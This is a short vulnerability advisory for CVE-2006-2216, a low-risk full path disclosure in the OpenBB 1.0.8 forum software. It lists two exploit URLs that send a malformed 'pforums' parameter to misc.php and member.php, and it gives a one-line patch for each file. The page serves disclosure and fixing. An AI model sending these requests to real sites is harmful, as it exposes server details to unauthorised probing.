OpenBB 1.0.8 Full Path Disclosure

2006.05.08

Credit: Devil-00

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2006-2216

CWE: CWE-Other

CVSS Base Score: 5/10

Impact Subscore: 2.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: None

Availability impact: None

OpenBB 1.0.8 Full Path Disclosure

Bug Found By :- Devil-00

Gr33tz :- Www.securitygurus.neT

Rock Master

Hackers Pal

n0m3rcy

-= 1-2 =-

Full Path Disclosure

Exploits :-

/OpenBB/misc.php?action=latest&pforums=D3vil-0x1

/OpenBB/member.php?action=online&&pforums=D3vil-0x1

Fix It :-

misc.php

Add This Line To '36' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

-------------------------------------

member.php

Add This Line To '759' Line Number

[code]

$pforums = array(); # D3vil-0x1 Fix

[/code]

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

OpenBB 1.0.8 Full Path Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

OpenBB 1.0.8 Full Path Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.